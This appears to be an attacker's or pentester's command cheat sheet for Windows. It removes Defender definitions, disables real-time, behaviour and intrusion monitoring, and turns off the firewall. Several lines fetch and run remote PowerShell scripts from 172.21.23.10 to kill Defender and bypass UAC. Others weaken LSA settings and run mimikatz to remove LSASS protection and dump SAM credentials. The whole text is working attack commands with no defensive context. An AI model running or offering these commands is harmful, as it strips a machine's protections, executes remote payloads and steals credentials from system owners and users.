cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -removedefinitions -all
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRealtimeMonitoring " /t REG_DWORD /d 1 /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableBehaviorMonitoring " /t REG_DWORD /d 1 /f
Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true
NetSh Advfirewall set allprofiles state off
iex(new-object net.webclient).downloadstring('http://172.21.23.10/defendersdeath.ps1')
iex(new-object net.webclient).downloadstring('http://172.21.23.10/fuckdefender.ps1')
New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name DisableRestrictedAdmin -Value 0
mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe /remove" "token::elevate" "lsadump::sam" exit
Kill Defender via TrustedInstaller
iex(new-object net.webclient).downloadstring('http://172.21.23.10/uacbypass.ps1');alt
.\wsudo -T powershell
.\fuckdefender.ps1
reboot
